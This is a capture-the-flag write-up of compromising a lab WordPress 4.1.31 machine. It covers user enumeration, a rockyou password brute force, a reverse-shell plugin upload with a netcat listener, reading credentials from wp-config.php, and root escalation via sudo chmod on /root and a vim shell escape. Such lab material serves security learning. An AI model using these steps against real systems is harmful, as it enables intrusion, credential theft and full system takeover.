# Write-up

### <mark style="color:purple;">Objectives</mark>

The objective is to capture both the user and root flags, demonstrating a complete system compromise.

***

### <mark style="color:purple;">Reconnaissance</mark>

We start by performing a port scan using Nmap:

```bash
sudo nmap -sCV -F -T5 <url>
```

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXesdvBaidPAo8ytNFX6i9-MgeUp5Df2khR5h38FAPsioIJKcHhf1ZFHO5XGsqpBIpxI2o20S3ZAFq7d4YxlcnSx1jKByfs03SKTbuJ_LLqUOUBzNITJSFNJHuzMDmnnz_o4MA5Cig?key=HlRiw9kURX5Bnr-nYdwQwJHB" alt="" width="375"><figcaption></figcaption></figure>

We can see that **WordPress 4.1.31** is running on port 80.

Using <mark style="color:blue;">**WPScan**</mark> to enumerate users:

```bash
wpscan --url http://10.10.70.7 --enumerate u
```

We find the following usernames: `hugo`, `c0ldd`, and `phillip`.

Next, we perform a brute-force attack with WPScan:

```bash
wpscan --url http://10.10.70.7/ --usernames hugo,c0ldd,phillip --passwords /usr/share/wordlists/rockyou.txt
```

After a few attempts, we successfully obtain the password for the user `c0ldd`.

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXdXa1KSoAa9JFCPYPGQOgmxnuWKx6uRkZEDSks_xFyNNncqVPIsmFZxXa9f-bDGM2d0NQA7z-EEWw-Dcjur-iHO_5che9XCrssq4Fd1BWy04wIYSKFW_h6G7qUhD40A7-4-3PuGeA?key=HlRiw9kURX5Bnr-nYdwQwJHB" alt=""><figcaption></figcaption></figure>

***

### <mark style="color:purple;">Gaining a Shell</mark>

Now, we access the WordPress admin panel and go to the **Plugins** section to manually upload a plugin.

We upload a plugin that contains a reverse shell script, such as the **PentestMonkey** PHP reverse shell, edited with our IP and port values.

Once uploaded, we access it via:

```html
http://<url>/wp-content/uploads/<year>/<month>/
```

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXd44xvvxUHjl657_HO1TMqfIzV3vU6_lfyDuFbgyF7TgleXvV6iSkoZ1LjFTi6TB4Wr8qxoq329JrUaQqJ_jQfwykkXR4y2HvkKvsQqlHhBW23FaGfeGOATWhgjwhKTuWqovGJzAQ?key=HlRiw9kURX5Bnr-nYdwQwJHB" alt="" width="375"><figcaption></figcaption></figure>

Before executing the reverse shell, we set up a listener on our machine:

```bash
nc -lnvp <port>
```

Then, we trigger the uploaded script to receive the shell.

To upgrade the shell, we use:

```bash
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

Running `whoami`, we confirm we are `www-data`.

Our next step is to find the user flag:

```bash
find / -type f -name "user.txt" 2>/dev/null
```

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXeM_EqzVHvMeXrQX1kFcjtVaHMGt6yTKv99sbwcY-iEgEhUruLXt58M_nurbqqg4TTBOzIEZa1RUB4Ii5yP0Q67baeyCZ--e56iK_1IhstRS5bP3tOZxlSZ2Ua4KIXC0ig6z61Jsw?key=HlRiw9kURX5Bnr-nYdwQwJHB" alt="" width="375"><figcaption></figcaption></figure>

However, we can't read the file due to permission restrictions, so we need access to the `c0ldd` user.

We check the WordPress config file for database credentials:

```bash
cat /var/www/html/wp-config.php | grep "DB_PASSWORD"
```

We retrieve the password for `c0ldd`.

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXe1oQI0hqAFdBA1Sk6ZZuiCSYJbyzgoM_kD5uW2JLrF27xCBy72VsBIFPLW-uzdXEljvWZ6Qh7-WCODuF_CA-oYnk3mAFm2c2eRZGYf49HA7q4Zu6Unb8RL8SKdS6IN9f9zMtAm?key=HlRiw9kURX5Bnr-nYdwQwJHB" alt="" width="375"><figcaption></figcaption></figure>

Then we switch user:

```bash
su c0ldd
```

Now, we can successfully read the `user.txt` flag. (If we decode it using `base64 --decode`, we get a congratulatory message.)

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXeN0OklFo2RA1m_NMD4QxUIjPRpCB6Yzon9FcUTVFFFtg4xPeS0_dgxlmgk4WRspO_TL3VrtLFuIAQ36MwwGn_4aTAhFJlKPyG27KK1o3IxrnxZ9sOxwe1PLpOhmQuhGx3B7KxaTQ?key=HlRiw9kURX5Bnr-nYdwQwJHB" alt="" width="375"><figcaption></figcaption></figure>

Next, we look for `root.txt`:

```bash
find / -type f -name "root.txt" 2>/dev/null
```

Again, we lack permission to read the file — so we need to escalate privileges to `root`.

***

### <mark style="color:purple;">Privilege Escalation</mark>

Using `sudo -l`, we see that we can run `vim`, `chmod`, and `ftp` as root. The easiest escalation path is using `chmod`:

```bash
sudo chmod 777 -R /root
cat /root/root.txt
```

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXen0q7-nGI5wTGINvWRRYyRs2KZ07UNwKS0ADM3489IIGTGAGgIQwrMPih_qeNKc_07ue1PTKABvYRadIKVB1AXTbNSDHlFznOjPmxN5P4bUFKdvc9OmCCMTP2e4vUzoCmZMe72?key=HlRiw9kURX5Bnr-nYdwQwJHB" alt="" width="375"><figcaption></figcaption></figure>

As an alternative method, we can escalate using `vim`:

```bash
sudo vim -c ':!/bin/sh'
```

<figure><img src="https://lh7-rt.googleusercontent.com/docsz/AD_4nXc-e0ywzVezy-yRg_St5KJnsqps_bgUCMCxs7PwYKierOu7gxorv9GIbXMZcAB4KMtPWBLoEkuQ3eufTinXlv-sIOfH6j69RSWz8it3DXzxz9fjN9beOYeOboRBduTpsd4kCljzLQ?key=HlRiw9kURX5Bnr-nYdwQwJHB" alt="" width="375"><figcaption></figcaption></figure>

And that's it — machine completed.